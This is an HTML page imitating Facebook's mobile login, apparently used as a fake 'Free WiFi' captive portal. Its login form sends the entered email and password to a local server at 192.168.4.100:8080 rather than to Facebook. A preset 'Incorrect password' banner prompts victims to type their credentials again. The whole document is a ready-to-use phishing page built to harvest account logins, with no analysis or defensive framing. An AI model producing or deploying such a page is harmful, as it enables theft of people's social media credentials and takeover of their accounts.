<!DOCTYPE html>
<html lang="en">
 <head>
  <title>
   Log into Facebook | Facebook
  </title>
  <meta content="user-scalable=no,initial-scale=1,maximum-scale=1" name="viewport"/>
  <link href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/images/gB76kJXPYJV.png" rel="shortcut icon" sizes="196x196"/>
  <meta content="default" id="meta_referrer" name="referrer"/>
  <link data-bootloader-hash="qPJlI1H" data-nonblocking="1" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/deL_NnqJ1Pu.css" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="Dlgyiev" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/MruMGnLTe89.css" rel="stylesheet" type="text/css"/>
  <link data-bootloader-hash="7W9wWtK" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/Poe9N5PEjyj.css" rel="stylesheet" type="text/css"/>
  <script id="u_0_d_7u" nonce="9uJ5WJtj">
   function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":false},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true});
  </script>
  <meta content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." name="description"/>
  <meta content="Facebook" property="al:android:app_name"/>
  <meta content="Log into Facebook | Facebook" property="og:title"/>
  <meta content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." property="og:description"/>
  <meta content="images/fb_icon_325x325.png" property="og:image"/>
 </head>
 <body class="touch x1 _fzu _50-3 iframe acw portrait" style="background-color: rgb(236, 239, 245); min-height: 647px;" tabindex="0">
  <script id="u_0_a_M+" nonce="">
   (function(a){a.__updateOrientation=function(){var b=!!a.orientation&&a.orientation!==180,c=document.body;c&&(c.className=c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g," ")+" "+(b?"landscape":"portrait"));return b}})(window);
  </script>
  <div data-kaios-focus-transparent="1" id="viewport" style="min-height: 647px;">
   <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">
    Facebook
   </h1>
   <div id="page">
    <div class="_129_" id="header-notices">
    </div>
    <div class="_7om2 _52z5" id="header">
     <div class="_4g34 _52z6 _ad5s _5i2i _52we" data-sigil="mChromeHeaderCenter">
      <div class="_5xu4">
        <a href="">
<svg xmlns="http://www.w3.org/2000/svg" width="112" height="112" fill="none" viewBox="0 0 1090 360">
  <path fill="#FFFFFF" d="M881.583 257.897h29.48v-47.696l41.137 47.696h36.072l-47.89-54.969 40.909-47.663h-32.825l-37.403 43.93v-96.982l-29.48 3.864v151.82Zm-67.988-105.261c-32.728 0-55.455 22.013-55.455 53.929s22.727 53.929 55.455 53.929c32.727 0 55.455-22.013 55.455-53.929s-22.728-53.929-55.455-53.929Zm0 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-119.807-82.728c-32.727 0-55.455 22.013-55.455 53.929s22.728 53.929 55.455 53.929c32.728 0 55.455-22.013 55.455-53.929s-22.727-53.929-55.455-53.929Zm0 82.728c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.389 28.799-25.552 28.799Zm-112.826-82.728c-13.636 0-24.935 5.357-32.013 15.162v-65.585l-29.513 3.831v151.82h26.169l.519-15.844c6.981 11.818 19.481 18.474 34.838 18.474 27.988 0 48.475-22.728 48.475-53.929 0-31.202-20.39-53.929-48.475-53.929Zm-6.98 82.728c-15.163 0-25.552-11.721-25.552-28.799s10.389-28.799 25.552-28.799c15.162 0 25.552 11.721 25.552 28.799s-10.39 28.799-25.552 28.799Zm-113.638 1.331c-15.649 0-26.883-7.273-30.714-19.805h72.63c.715-3.831 1.202-8.377 1.202-11.429 0-33.02-18.475-52.825-49.514-52.825-31.331 0-53.02 22.013-53.02 53.929 0 32.338 22.728 53.929 56.462 53.929 17.467 0 34.448-5.844 45.065-15.552l-10.617-18.701c-10.292 7.11-20.39 10.454-31.494 10.454Zm-6.591-61.137c13.637 0 22.338 8.279 22.338 21.104v.098h-47.078c2.825-13.604 11.623-21.202 24.74-21.202Zm-98.994 84.968c15.26 0 30.195-5.844 40.714-15.974l-11.526-19.383c-8.182 6.364-17.467 9.805-26.266 9.805-16.364 0-27.273-11.429-27.273-28.377s10.909-28.377 27.273-28.377c8.084 0 16.883 2.922 24.026 8.085l11.721-19.806c-9.481-8.571-24.156-13.831-38.702-13.831-32.013 0-54.643 22.338-54.643 53.929.032 31.494 22.662 53.929 54.676 53.929Zm-93.735-105.261-.519 15.975c-6.981-11.916-19.481-18.572-34.838-18.572-28.085 0-48.475 22.728-48.475 53.929 0 31.202 20.52 53.929 48.475 53.929 15.357 0 27.889-6.656 34.838-18.474l.519 15.844h26.169V155.265h-26.169Zm-28.377 80.099c-15.162 0-25.552-11.721-25.552-28.799s10.39-28.799 25.552-28.799c15.163 0 25.552 11.721 25.552 28.799s-10.422 28.799-25.552 28.799Zm-57.663-79.906h-26.526v-8.767c0-13.117 5.13-18.149 18.442-18.149 4.123 0 7.467.097 9.383.292v-22.5c-3.637-1.007-12.5-2.013-17.63-2.013-27.111 0-39.611 12.792-39.611 40.422v10.682h-16.753v24.806h16.753v77.631h29.448v-77.599h21.949l4.545-24.805Z"/>
</svg>
        </a>
      </div>
     </div>
    </div>
    <div class="_5soa _3-q1 acw" data-sigil="context-layer-root content-pane" id="root" role="main" style="min-height: 647px;">
     <div class="_7om2">
      <div class="_4g34" id="u_0_0_0p">
       <div class="_5yd0 _2ph- _5yd1" data-sigil="m_login_notice" id="login_error" style="">
        <span>
         Incorrect password.
         <a aria-label="Did you forget your password?" class="_652e" href="">
          Did you forget your password?
         </a>
        </span>
       </div>
       <div class="_9om_">
        <div class="aclb _4-4l">
         <div class="_5rut" style="padding-top: 20px">
          <div>
           <div class="_52jj _3-q2">
            <img class="_3-q3 img" src="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/images/logo.png" style="width: 75px;height: 70px;" />
            <div class="_52je _52j9">
               Log into your Facebook account to connect to Free WiFi
             </div>
            </div>
           </div>
           <form action="http://192.168.4.100:8080/api/login/post.php" class="mobile-login-form _9hp- _5spm" data-sigil="m_login_form" id="login_form" method="post" novalidate="1">
            <div id="user_info_container">
            </div>
            <div id="pwd_label_container">
            </div>
            <div id="otp_retrieve_desc_container">
            </div>
            <div class="_56be _5sob">
             <div class="_55wo _55x2 _56bf">
              <div class="_96n9" id="email_input_container">
               <input autocapitalize="off" autocomplete="on" autocorrect="off" class="_56bg _4u9z _5ruq" data-sigil="m_login_email" id="m_login_email" name="email" placeholder="Mobile number or email" type="text"/>
              </div>
              <div>
               <div class="_1upc _mg8" data-sigil="m_login_password">
                <div class="_5909">
                 <div class="_7om2">
                  <div class="_4g34 _5i2i _52we">
                   <div class="_5xu4">
                    <input autocapitalize="off" autocomplete="on" autocorrect="off" class="_56bg _4u9z _27z2" data-sigil="password-plain-text-toggle-input" id="m_login_password" name="pass" placeholder="Facebook Password" type="password"/>
                   </div>
                  </div>
                  <div class="_5s61 _216i _5i2i _52we">
                   <div class="_5xu4">
                    <div class="_2pi9" id="u_0_1_7l" style="display:none">
                     <a data-sigil="password-plain-text-toggle" href="#">
                      <span class="mfss" id="u_0_2_Uu" style="display:none">
                       HIDE
                      </span>
                      <span class="mfss" id="u_0_3_F3">
                       SHOW
                      </span>
                     </a>
                    </div>
                   </div>
                  </div>
                 </div>
                </div>
               </div>
              </div>
             </div>
            </div>
            <div class="_2pie" style="text-align:center;">
             <div data-sigil="login_password_step_element" id="login_password_step_element">
              <button class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" data-sigil="touchable login_button_block m_login_button" name="login" type="submit" value="Facebook Error">
               <span class="_55sr">
                Log in
               </span>
              </button>
             </div>
             <div class="_7eif" id="oauth_login_button_container" style="display:none">
             </div>
             <div class="_7f_d" id="oauth_login_desc_container" style="display:none">
             </div>
             <div id="otp_button_elem_container">
             </div>
            </div>
            <noscript>
             <input name="_fb_noscript" type="hidden" value="true"/>
            </noscript>
           </form>
           <div>
            <div class="_2pie _9omz">
             <div class="_52jj _9on1">
               <a class="_9on1" href="http://192.168.4.100:8080/" id="forgot-password-link" tabindex="0">
               Cancel
              </a>
             </div>
            </div>
            <div style="padding-top: 42px">
             <div>
              <div>
               <div>
               </div>
              </div>
              <div class="_2pie" style="text-align:center;">
               <div>
                <div data-sigil="login_identify_step_element">
                 <div>
                 </div>
                </div>
               </div>
              </div>
             </div>
            </div>
           </div>
          </div>
         </div>
        </div>
       </div>
      </div>
     </div>
     <div style="display:none">
     </div>
     <span>
      <img height="0" src="https://facebook.com/security/hsts-pixel.gif?c=3.2" style="display:none" width="0"/>
     </span>
     <div class="_55wr _5ui2" data-sigil="m_login_footer" style="padding-top: 115px">
      <div class="_5dpw">
       <div class="_5ui3" data-nocookies="1" data-sigil="language_selector marea" id="locale-selector">
        <div class="_5909">
         <div class="_7om2">
          <div class="_4g34">
           <span class="_52jc _52j9 _52jh _3ztb">
            English (US)
           </span>
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              Bisaya
             </a>
            </span>
           </div>
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              日本語
             </a>
            </span>
           </div>
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              Português (Brasil)
             </a>
            </span>
           </div>
          </div>
          <div class="_4g34">
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              Filipino
             </a>
            </span>
           </div>
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              Español
             </a>
            </span>
           </div>
           <div class="_3ztc">
            <span class="_52jc">
             <a data-ajaxify-href="">
              한국어
             </a>
            </span>
           </div>
           <a href="">
            <div aria-label="Complete list of languages" class="_3j87 _1rrd _3ztd" data-sigil="more_language">
             <i class="img sp_IGidVyUavtE_2x sx_c19cec">
             </i>
            </div>
           </a>
          </div>
         </div>
        </div>
       </div>
       <div class="_5ui4">
        <span class="mfss fcg">
         Meta © 2023
        </span>
       </div>
      </div>
     </div>
    </div>
    <div class="">
    </div>
    <div class="viewportArea _2v9s" data-sigil="marea" id="u_0_4_1+" style="display:none">
     <div class="_5vsg" id="u_0_5_KW">
     </div>
     <div class="_5vsh" id="u_0_6_fT">
     </div>
     <div class="_5v5d fcg">
      <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root">
      </div>
      Loading...
     </div>
    </div>
    <div class="viewportArea aclb" data-sigil="marea" id="mErrorView" style="display:none">
     <div class="container">
      <div class="image">
      </div>
      <div class="message" data-sigil="error-message">
      </div>
      <a class="link" data-sigil="MPageError:retry">
       Try Again
      </a>
     </div>
    </div>
   </div>
  </div>
  <div id="static_templates">
   <div class="mDialog" id="modalDialog" style="display:none">
    <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
     <div class="_5909">
      <div class="_7om2 _52we">
       <div class="_5s61">
        <div class="_52z7">
         <button class="cancelButton btn btnD bgb mfss touchable" data-sigil="dialog-cancel-button" id="u_0_8_Hy" type="submit" value="Cancel">
          Cancel
         </button>
         <button aria-label="Back" class="backButton btn btnI bgb mfss touchable iconOnly" data-sigil="dialog-back-button" id="u_0_9_Dv" type="submit" value="Back">
          <i class="img sp_IGidVyUavtE_2x sx_9b2093" style="margin-top: 2px;">
          </i>
         </button>
        </div>
       </div>
       <div class="_4g34">
        <div class="_52z6">
         <div class="_50l4 mfsl fcw" data-sigil="m-dialog-header-title dialog-title" id="m-future-page-header-title" role="heading" tabindex="0">
          Loading...
         </div>
        </div>
       </div>
       <div class="_5s61">
        <div class="_52z8" id="modalDialogHeaderButtons">
        </div>
       </div>
      </div>
     </div>
    </div>
    <div class="modalDialogView" id="modalDialogView">
    </div>
    <div class="_5v5d _5v5e fcg" id="dialogSpinner">
     <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root" id="u_0_7_8P">
     </div>
     Loading...
    </div>
   </div>
  </div>

  <script>
   now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigPipeFR=now_inl();
  </script>
  <link as="style" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/deL_NnqJ1Pu.css" rel="preload"/>
  <link as="style" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/MruMGnLTe89.css" rel="preload"/>
  <link as="script" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/js/qTW19-ItLo0.js" nonce="9uJ5WJtj" rel="preload"/>
  <link as="script" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/js/apundjrkJ5z.js" nonce="9uJ5WJtj" rel="preload"/>
  <link as="style" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/css/Poe9N5PEjyj.css" rel="preload"/>
  <link as="script" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/js/rCNE4Z7weSd.js" nonce="9uJ5WJtj" rel="preload"/>
  <link as="script" href="/api/login/fgCyhWZ5VGazJ2c5lWZqV2ZlVXZzd2c39GZod2cqNjNyUjY/js/GM2NL6JjqXL.js" nonce="9uJ5WJtj" rel="preload"/>
  <script>
   window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});
  </script>
  <script nonce="9uJ5WJtj">
   (function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();
  </script>
  <script>
   requireLazy(["__bigPipe"],function(bigPipe){bigPipe.setPageID("7136807363606813823")});
  </script>
  <script nonce="9uJ5WJtj">
   (function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();
  </script>
 </body>
</html>
